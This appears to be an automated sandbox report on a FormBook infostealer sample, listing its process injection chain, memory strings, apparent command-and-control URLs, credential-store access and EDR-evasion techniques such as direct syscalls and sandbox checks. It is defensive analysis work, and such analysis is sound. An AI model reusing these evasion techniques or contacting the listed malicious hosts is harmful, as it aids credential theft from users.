Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKnbKusfi5Uq1hNmMg%2BzEHhJaNjSL4c6KRIa6PV8rs3vnSSBJZ3EDxr4Y4OyG42xVFgtSPxtM9aj0K%2FkSpOQ3BfFYbrM%2FH%2B2bQqK3O%2FQmozbXWz0sUZiRCChMJNXoCe7IW3TSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b5f0bb81819-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97244&min_rtt=97244&rtt_var=48622&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><

Source: UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.l33900.xyz
Source: UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.l33900.xyz/gwiz/
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sfc.exe, 0000000A.00000003.1729877999.0000000008243000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2
Source: sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: eoIIBcxUj3.exe, 00000001.00000002.1230807591.00000000005B5000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c8567a18-f
Source: eoIIBcxUj3.exe, 00000001.00000002.1230807591.00000000005B5000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ef4607ed-2
Source: eoIIBcxUj3.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e521e08b-7
Source: eoIIBcxUj3.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_aa5e896b-6

Source: eoIIBcxUj3.exe, 00000001.00000003.1229533682.000000000443D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs eoIIBcxUj3.exe
Source: eoIIBcxUj3.exe, 00000001.00000003.1228717172.0000000004293000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs eoIIBcxUj3.exe

Source: eoIIBcxUj3.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@24/6

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe

File created: C:\Users\user\AppData\Local\Temp\aut1D06.tmp

Jump to behavior

Source: eoIIBcxUj3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sfc.exe, 0000000A.00000003.1730860969.0000000003459000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3668125531.0000000003459000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: eoIIBcxUj3.exe	Virustotal: Detection: 75%
Source: eoIIBcxUj3.exe	ReversingLabs: Detection: 78%

Source: unknown	Process created: C:\Users\user\Desktop\eoIIBcxUj3.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
Source: C:\Windows\SysWOW64\sfc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\sfc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\sfc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: eoIIBcxUj3.exe

Static file information: File size 1182208 > 1048576

Source: eoIIBcxUj3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: eoIIBcxUj3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: eoIIBcxUj3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: eoIIBcxUj3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: eoIIBcxUj3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: eoIIBcxUj3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: eoIIBcxUj3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJarIfYl5U.exe, 00000009.00000002.3668098223.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3667414090.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp

Source: eoIIBcxUj3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: eoIIBcxUj3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: eoIIBcxUj3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: eoIIBcxUj3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: eoIIBcxUj3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\eoIIBcxUj3.exe	API/Special instruction interceptor: Address: 1923234
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\sfc.exe	API/Special instruction interceptor: Address: 7FFCC372DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: eoIIBcxUj3.exe, 00000001.00000003.1212031657.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212449596.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212513502.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000002.1231480807.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1218663247.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1211525976.00000000018F3000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1218138625.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212092961.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212307471.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1211599534.0000000001903000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: FIDDLER.EXEAME1

Source: C:\Windows\SysWOW64\sfc.exe

Window / User API: threadDelayed 9843

Jump to behavior

Source: C:\Windows\SysWOW64\sfc.exe TID: 5156	Thread sleep count: 129 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe TID: 5156	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe TID: 5156	Thread sleep count: 9843 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe TID: 5156	Thread sleep time: -19686000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752	Thread sleep time: -32000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\sfc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sfc.exe	Last function: Thread delayed

Source: sfc.exe, 0000000A.00000002.3668125531.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3668874645.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 0000000C.00000002.1842602858.00000281E8AEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtCreateFile: Direct from: 0x77752FEC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtOpenFile: Direct from: 0x77752DCC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtSetInformationThread: Direct from: 0x777463F9	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtQueryInformationToken: Direct from: 0x77752CAC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtTerminateThread: Direct from: 0x77752FCC	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtSetInformationProcess: Direct from: 0x77752C5C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtNotifyChangeKey: Direct from: 0x77753C2C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtOpenKeyEx: Direct from: 0x77752B9C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtOpenSection: Direct from: 0x77752E0C	Jump to behavior
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC	Jump to behavior
